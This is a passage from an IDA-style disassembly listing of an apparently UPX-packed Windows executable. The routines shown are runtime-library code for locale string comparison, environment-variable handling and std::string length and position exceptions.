mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_425EAE
loc_425EF6: ; CODE XREF: sub_425E95+11�j
xor eax, eax
loc_425EF8: ; CODE XREF: sub_425E95+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_425EFE: ; CODE XREF: sub_425E95+29�j
; sub_425E95+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_425EF8
sub_425E95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425F03 proc near ; CODE XREF: sub_425E56+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427CE8
push offset sub_4234B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp ds:dword_4DBC68, ebx
push 1
pop edi
jnz short loc_425F76
push edi
mov eax, offset dword_427938
push eax
push edi
push eax
push ebx
push ebx
call dword_427008 ; CompareStringW
test eax, eax
jz short loc_425F53
mov ds:dword_4DBC68, edi
jmp short loc_425F76
; ---------------------------------------------------------------------------
loc_425F53: ; CODE XREF: sub_425F03+46�j
push edi
mov eax, offset dword_4CB50C
push eax
push edi
push eax
push ebx
push ebx
call dword_42700C ; CompareStringA
test eax, eax
jz loc_42616C
mov ds:dword_4DBC68, 2
loc_425F76: ; CODE XREF: sub_425F03+31�j
; sub_425F03+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_425F8D
push esi
push [ebp+arg_8]
call sub_426180
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_425F8D: ; CODE XREF: sub_425F03+78�j
cmp [ebp+arg_14], ebx
jle short loc_425FA2
push [ebp+arg_14]
push [ebp+arg_10]
call sub_426180
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_425FA2: ; CODE XREF: sub_425F03+8D�j
mov eax, ds:dword_4DBC68
cmp eax, 2
jnz short loc_425FC7
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_42700C ; CompareStringA
jmp loc_42616E
; ---------------------------------------------------------------------------
loc_425FC7: ; CODE XREF: sub_425F03+A7�j
cmp eax, edi
jnz loc_42616C
cmp [ebp+arg_18], ebx
jnz short loc_425FDC
mov eax, ds:dword_4DBA24
mov [ebp+arg_18], eax
loc_425FDC: ; CODE XREF: sub_425F03+CF�j
cmp esi, ebx
jz short loc_425FE9
cmp [ebp+arg_14], ebx
jnz loc_426081
loc_425FE9: ; CODE XREF: sub_425F03+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_425FF6
loc_425FEE: ; CODE XREF: sub_425F03+13C�j
; sub_425F03+16D�j
push 2
loc_425FF0: ; CODE XREF: sub_425F03+146�j
pop eax
jmp loc_42616E
; ---------------------------------------------------------------------------
loc_425FF6: ; CODE XREF: sub_425F03+E9�j
cmp [ebp+arg_14], edi
jle short loc_426002
loc_425FFB: ; CODE XREF: sub_425F03+151�j
; sub_425F03+159�j ...
mov eax, edi
jmp loc_42616E
; ---------------------------------------------------------------------------
loc_426002: ; CODE XREF: sub_425F03+F6�j
cmp esi, edi
jg short loc_426047
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call dword_4271CC ; GetCPInfo
test eax, eax
jz loc_42616C
cmp esi, ebx
jle short loc_42604B
cmp [ebp+var_3C], 2
jb short loc_426047
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_426047
loc_42602D: ; CODE XREF: sub_425F03+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_426047
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_426041
cmp cl, dl
jbe short loc_425FEE
loc_426041: ; CODE XREF: sub_425F03+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_42602D
loc_426047: ; CODE XREF: sub_425F03+101�j
; sub_425F03+120�j ...
push 3
jmp short loc_425FF0
; ---------------------------------------------------------------------------
loc_42604B: ; CODE XREF: sub_425F03+11A�j
cmp [ebp+arg_14], ebx
jle short loc_426081
cmp [ebp+var_3C], 2
jb short loc_425FFB
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_425FFB
loc_42605E: ; CODE XREF: sub_425F03+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_425FFB
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_426076
cmp cl, dl
jbe loc_425FEE
loc_426076: ; CODE XREF: sub_425F03+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_42605E
jmp loc_425FFB
; ---------------------------------------------------------------------------
loc_426081: ; CODE XREF: sub_425F03+E0�j
; sub_425F03+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call dword_427180 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_42616C
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4260D0
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_4260D0: ; CODE XREF: sub_425F03+1B5�j
cmp [ebp+var_24], ebx
jz loc_42616C
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, dword_427180
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_42616C
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_42616C
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_41BB20
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42613B
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_42613B: ; CODE XREF: sub_425F03+224�j
cmp edi, ebx
jz short loc_42616C
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_427180 ; MultiByteToWideChar
test eax, eax
jz short loc_42616C
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_427008 ; CompareStringW
jmp short loc_42616E
; ---------------------------------------------------------------------------
loc_42616C: ; CODE XREF: sub_425F03+63�j
; sub_425F03+C6�j ...
xor eax, eax
loc_42616E: ; CODE XREF: sub_425F03+BF�j
; sub_425F03+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_425F03 endp
; =============== S U B R O U T I N E =======================================
sub_426180 proc near ; CODE XREF: sub_422ACA+81�p
; sub_425F03+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_42619D
loc_426190: ; CODE XREF: sub_426180+1B�j
cmp byte ptr [eax], 0
jz short loc_42619D
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_426190
loc_42619D: ; CODE XREF: sub_426180+E�j
; sub_426180+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4261A8
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4261A8: ; CODE XREF: sub_426180+21�j
mov eax, edx
retn
sub_426180 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4261AB proc near ; CODE XREF: sub_425E95+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_42620F
push 3Dh
push [ebp+arg_0]
call sub_4263F1
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_42620F
cmp [ebp+arg_0], esi
jz short loc_42620F
mov eax, ds:dword_4DB980
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, ds:dword_4DB984
jnz short loc_4261F5
push eax
call sub_42638A
pop ecx
mov ds:dword_4DB980, eax
loc_4261F5: ; CODE XREF: sub_4261AB+3C�j
cmp eax, edi
jnz short loc_42624D
cmp [ebp+arg_4], edi
jz short loc_426217
cmp ds:dword_4DB988, edi
jz short loc_426217
call sub_425E95
test eax, eax
jz short loc_42624D
loc_42620F: ; CODE XREF: sub_4261AB+D�j
; sub_4261AB+22�j ...
or eax, 0FFFFFFFFh
loc_426212: ; CODE XREF: sub_4261AB+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_426217: ; CODE XREF: sub_4261AB+51�j
; sub_4261AB+59�j
cmp ebx, edi
jnz loc_42632B
push 4
call sub_41B4D5
cmp eax, edi
pop ecx
mov ds:dword_4DB980, eax
jz short loc_42620F
mov [eax], edi
cmp ds:dword_4DB988, edi
jnz short loc_42624D
push 4
call sub_41B4D5
cmp eax, edi
pop ecx
mov ds:dword_4DB988, eax
jz short loc_42620F
mov [eax], edi
loc_42624D: ; CODE XREF: sub_4261AB+4C�j
; sub_4261AB+62�j ...
sub esi, [ebp+arg_0]
mov edi, ds:dword_4DB980
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_426332
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_4262AD
cmp dword ptr [edi], 0
jz short loc_4262AD
test ebx, ebx
jz short loc_4262A5
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_41B0B1
pop ecx
loc_42627F: ; CODE XREF: sub_4261AB+E2�j
cmp dword ptr [edi], 0
jz short loc_42628F
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_42627F
; ---------------------------------------------------------------------------
loc_42628F: ; CODE XREF: sub_4261AB+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_41B202
pop ecx
test eax, eax
pop ecx
jz short loc_4262DF
jmp short loc_4262DA
; ---------------------------------------------------------------------------
loc_4262A5: ; CODE XREF: sub_4261AB+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_4262DF
; ---------------------------------------------------------------------------
loc_4262AD: ; CODE XREF: sub_4261AB+BD�j
; sub_4261AB+C2�j
test ebx, ebx
jnz short loc_42632B
test esi, esi
jge short loc_4262B7
neg esi
loc_4262B7: ; CODE XREF: sub_4261AB+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_41B202
pop ecx
test eax, eax
pop ecx
jz loc_42620F
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_4262DA: ; CODE XREF: sub_4261AB+F8�j
mov ds:dword_4DB980, eax
loc_4262DF: ; CODE XREF: sub_4261AB+F6�j
; sub_4261AB+100�j
cmp [ebp+arg_4], 0
jz short loc_42632B
push [ebp+arg_0]
call sub_41AFE0
inc eax
inc eax
push eax
call sub_41B4D5
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42632B
push [ebp+arg_0]
push esi
call sub_41BEB0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_427004 ; SetEnvironmentVariableA
push esi
call sub_41B0B1
pop ecx
loc_42632B: ; CODE XREF: sub_4261AB+6E�j
; sub_4261AB+104�j ...
xor eax, eax
jmp loc_426212
sub_4261AB endp
; =============== S U B R O U T I N E =======================================
sub_426332 proc near ; CODE XREF: sub_4261AB+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ds:dword_4DB980
push edi
mov eax, [esi]
test eax, eax
jz short loc_42636D
mov edi, [esp+8+arg_4]
loc_426344: ; CODE XREF: sub_426332+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_425E56
add esp, 0Ch
test eax, eax
jnz short loc_426363
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_42637D
test al, al
jz short loc_42637D
loc_426363: ; CODE XREF: sub_426332+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_426344
loc_42636D: ; CODE XREF: sub_426332+C�j
mov eax, esi
sub eax, ds:dword_4DB980
sar eax, 2
neg eax
loc_42637A: ; CODE XREF: sub_426332+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42637D: ; CODE XREF: sub_426332+2B�j
; sub_426332+2F�j
mov eax, esi
sub eax, ds:dword_4DB980
sar eax, 2
jmp short loc_42637A
sub_426332 endp
; =============== S U B R O U T I N E =======================================
sub_42638A proc near ; CODE XREF: sub_4261AB+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_426399
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_426399: ; CODE XREF: sub_42638A+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_4263AB
loc_4263A1: ; CODE XREF: sub_42638A+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_4263A1
loc_4263AB: ; CODE XREF: sub_42638A+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_41B4D5
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_4263CC
push 9
call sub_41DA29
pop ecx
loc_4263CC: ; CODE XREF: sub_42638A+38�j
mov eax, [edi]
mov ebx, edi
loc_4263D0: ; CODE XREF: sub_42638A+5B�j
test eax, eax
jz short loc_4263E7
push eax
add ebx, 4
call sub_426464
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_4263D0
; ---------------------------------------------------------------------------
loc_4263E7: ; CODE XREF: sub_42638A+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_42638A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4263F1 proc near ; CODE XREF: sub_4261AB+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_4DCDBC, 0
jnz short loc_42640C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41BFB0
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42640C: ; CODE XREF: sub_4263F1+A�j
mov ecx, [ebp+arg_0]
loc_42640F: ; CODE XREF: sub_4263F1+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_426452
movzx edx, al
test ds:byte_4DCEC1[edx], 4
jz short loc_42643E
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_426449
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_42644D
jmp short loc_426446
; ---------------------------------------------------------------------------
loc_42643E: ; CODE XREF: sub_4263F1+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_426452
loc_426446: ; CODE XREF: sub_4263F1+4B�j
inc ecx
jmp short loc_42640F
; ---------------------------------------------------------------------------
loc_426449: ; CODE XREF: sub_4263F1+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42644D: ; CODE XREF: sub_4263F1+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_426452: ; CODE XREF: sub_4263F1+25�j
; sub_4263F1+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_4263F1 endp
; =============== S U B R O U T I N E =======================================
sub_426464 proc near ; CODE XREF: sub_417EEF+21�p
; sub_42638A+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_42648B
push esi
call sub_41AFE0
inc eax
push eax
call sub_41B4D5
pop ecx
test eax, eax
pop ecx
jz short loc_42648B
push esi
push eax
call sub_41BEB0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_42648B: ; CODE XREF: sub_426464+7�j
; sub_426464+1A�j
xor eax, eax
pop esi
retn
sub_426464 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_426490 proc near ; CODE XREF: sub_426573+19�p
; sub_42669A+19�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
xor eax, eax
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_41AFE0
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_40D6F0
mov eax, esi
pop esi
retn 8
sub_426490 endp
; =============== S U B R O U T I N E =======================================
sub_4264BA proc near ; CODE XREF: UPX0:004264E5�p
; sub_426568+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427D04
call sub_40D6B4
mov ecx, esi
pop esi
jmp sub_4268B6
sub_4264BA endp
; =============== S U B R O U T I N E =======================================
sub_4264D5 proc near ; DATA XREF: UPX0:00427D08�o
; UPX0:00427D18�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_4264E1
mov eax, offset dword_4276A0
locret_4264E1: ; CODE XREF: sub_4264D5+5�j
retn
sub_4264D5 endp
; ---------------------------------------------------------------------------
loc_4264E2: ; DATA XREF: UPX0:off_427D04�o
push esi
mov esi, ecx
call sub_4264BA
test byte ptr [esp+8], 1
jz short loc_4264F8
push esi
call sub_41CC83
pop ecx
loc_4264F8: ; CODE XREF: UPX0:004264EF�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4264FE proc near ; CODE XREF: sub_426573+29�p
mov eax, offset loc_426E32
call sub_41CC64
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_427D20
call sub_42682F
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427D04
call sub_4265B0
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_427D14
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4264FE endp
; =============== S U B R O U T I N E =======================================
sub_42654C proc near ; DATA XREF: UPX0:off_427D14�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426568
test [esp+4+arg_0], 1
jz short loc_426562
push esi
call sub_41CC83
pop ecx
loc_426562: ; CODE XREF: sub_42654C+D�j
mov eax, esi
pop esi
retn 4
sub_42654C endp
; =============== S U B R O U T I N E =======================================
sub_426568 proc near ; CODE XREF: sub_42654C+3�p
; DATA XREF: UPX0:0042808C�o
mov dword ptr [ecx], offset off_427D14
jmp sub_4264BA
sub_426568 endp
; =============== S U B R O U T I N E =======================================
sub_426573 proc near ; CODE XREF: sub_40D561+13�p
; sub_40D725+E�p
mov eax, offset loc_426E44
call sub_41CC64
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-20h]
call sub_426490
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4264FE
push offset dword_428088
lea eax, [ebp-3Ch]
push eax
call sub_4268D9
int 3 ; Trap to Debugger
sub_426573 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4265B0 proc near ; CODE XREF: sub_4264FE+32�p
; sub_4265D0+32�p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push 0FFFFFFFFh
mov esi, ecx
push eax
push [esp+0Ch+arg_0]
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_40D561
mov eax, esi
pop esi
retn 4
sub_4265B0 endp
; =============== S U B R O U T I N E =======================================
sub_4265D0 proc near ; CODE XREF: sub_42669A+29�p
mov eax, offset loc_426E56
call sub_41CC64
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_427D20
call sub_42682F
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427D04
call sub_4265B0
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4265D0 endp
; =============== S U B R O U T I N E =======================================
sub_426618 proc near ; CODE XREF: sub_426682+7�p
; sub_4266DE+7�p ...
mov eax, offset loc_426E68
call sub_41CC64
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_42686C
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_427D04
call sub_4265B0
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_426618 endp
; =============== S U B R O U T I N E =======================================
sub_42665B proc near ; DATA XREF: UPX0:off_427D40�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_426677
test [esp+4+arg_0], 1
jz short loc_426671
push esi
call sub_41CC83
pop ecx
loc_426671: ; CODE XREF: sub_42665B+D�j
mov eax, esi
pop esi
retn 4
sub_42665B endp
; =============== S U B R O U T I N E =======================================
sub_426677 proc near ; CODE XREF: sub_42665B+3�p
; DATA XREF: UPX0:00428134�o
mov dword ptr [ecx], offset off_427D40
jmp sub_4264BA
sub_426677 endp
; =============== S U B R O U T I N E =======================================
sub_426682 proc near ; CODE XREF: sub_4266F6+46�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_426618
mov dword ptr [esi], offset off_427D14
mov eax, esi
pop esi
retn 4
sub_426682 endp
; =============== S U B R O U T I N E =======================================
sub_42669A proc near ; CODE XREF: sub_40D4B1+15�p
; sub_40D50A+15�p ...
mov eax, offset loc_426E7A
call sub_41CC64
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-20h]
call sub_426490
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_4265D0
push offset dword_428130
lea eax, [ebp-3Ch]
push eax
mov dword ptr [ebp-3Ch], offset off_427D40
call sub_4268D9
int 3 ; Trap to Debugger
sub_42669A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4266DE proc near ; CODE XREF: sub_4266F6+28�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
call sub_426618
mov dword ptr [esi], offset off_427D40
mov eax, esi
pop esi
retn 4
sub_4266DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4266F6 proc near ; DATA XREF: UPX0:00427D0C�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_426618
push offset dword_428170
lea eax, [ebp+var_1C]
push eax
call sub_4268D9
int 3 ; Trap to Debugger
loc_426714: ; DATA XREF: UPX0:00427D48�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_4266DE
push offset dword_428130
lea eax, [ebp+var_1C]
push eax
call sub_4268D9
int 3 ; Trap to Debugger
loc_426732: ; DATA XREF: UPX0:00427D1C�o
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_426682
push offset dword_428088
lea eax, [ebp+var_1C]
push eax
call sub_4268D9
int 3 ; Trap to Debugger
sub_4266F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426750 proc near ; CODE XREF: sub_40D99C+6C�p
jmp dword_4271D8
sub_426750 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_426756 proc near ; CODE XREF: sub_40CE41+5E�p
; sub_40E992+14A�p ...
jmp dword_42722C
sub_426756 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42675C proc near ; CODE XREF: sub_41C8D0+23�p
; sub_41CB74+13�p
jmp dword_42719C
sub_42675C endp
; =============== S U B R O U T I N E =======================================
sub_426762 proc near ; CODE XREF: sub_417276+E2�p
; sub_417276+F9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_4DBA14, 0
push ebx
jnz short loc_4267A8
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_426774: ; CODE XREF: sub_426762+42�j
mov bx, [ecx]
cmp bx, 5Ah
ja short loc_426786
cmp bx, 41h
jb short loc_426786
add ebx, 20h
loc_426786: ; CODE XREF: sub_426762+19�j
; sub_426762+1F�j
mov ax, [edx]
cmp ax, 5Ah
ja short loc_426798
cmp ax, 41h
jb short loc_426798
add eax, 20h
loc_426798: ; CODE XREF: sub_426762+2B�j
; sub_426762+31�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_4267D8
cmp bx, ax
jz short loc_426774
jmp short loc_4267D8
; ---------------------------------------------------------------------------
loc_4267A8: ; CODE XREF: sub_426762+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_4267B2: ; CODE XREF: sub_426762+72�j
mov ax, [esi]
inc esi
push eax
inc esi
call sub_426913
mov ebx, eax
mov ax, [edi]
inc edi
push eax
inc edi
call sub_426913
pop ecx
test bx, bx
pop ecx
jz short loc_4267D6
cmp bx, ax
jz short loc_4267B2
loc_4267D6: ; CODE XREF: sub_426762+6D�j
pop edi
pop esi
loc_4267D8: ; CODE XREF: sub_426762+3D�j
; sub_426762+44�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_426762 endp
; =============== S U B R O U T I N E =======================================
sub_4267E2 proc near ; CODE XREF: UPX0:004267FA�p
mov dword ptr [ecx], offset off_427D60
mov ecx, [ecx+4]
test ecx, ecx
jz short locret_4267F6
push ecx
call sub_41B0B1
pop ecx
locret_4267F6: ; CODE XREF: sub_4267E2+B�j
retn
sub_4267E2 endp
; ---------------------------------------------------------------------------
loc_4267F7: ; DATA XREF: UPX0:off_427D60�o
push esi
mov esi, ecx
call sub_4267E2
test byte ptr [esp+8], 1
jz short loc_42680D
push esi
call sub_41CC83
pop ecx
loc_42680D: ; CODE XREF: UPX0:00426804�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_426813: ; DATA XREF: UPX0:off_427D68�o
push esi
mov esi, ecx
call sub_4268B6
test byte ptr [esp+8], 1
jz short loc_426829
push esi
call sub_41CC83
pop ecx
loc_426829: ; CODE XREF: UPX0:00426820�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_42682F proc near ; CODE XREF: sub_4264FE+1D�p
; sub_4265D0+1D�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_427D68
push dword ptr [edi]
call sub_41AFE0
inc eax
push eax
call sub_41CFC5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_42685E
push dword ptr [edi]
push eax
call sub_41BEB0
pop ecx
pop ecx
loc_42685E: ; CODE XREF: sub_42682F+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_42682F endp
; =============== S U B R O U T I N E =======================================
sub_42686C proc near ; CODE XREF: sub_426618+16�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_427D68
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_4268A9
push dword ptr [edi+4]
call sub_41AFE0
inc eax
push eax
call sub_41CFC5
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_4268AF
push dword ptr [edi+4]
push eax
call sub_41BEB0
pop ecx
pop ecx
jmp short loc_4268AF
; ---------------------------------------------------------------------------
loc_4268A9: ; CODE XREF: sub_42686C+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_4268AF: ; CODE XREF: sub_42686C+2E�j
; sub_42686C+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_42686C endp
; =============== S U B R O U T I N E =======================================
sub_4268B6 proc near ; CODE XREF: sub_4264BA+16�j
; UPX0:00426816�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_427D68
jz short locret_4268CB
push dword ptr [ecx+4]
call sub_41CC83
pop ecx
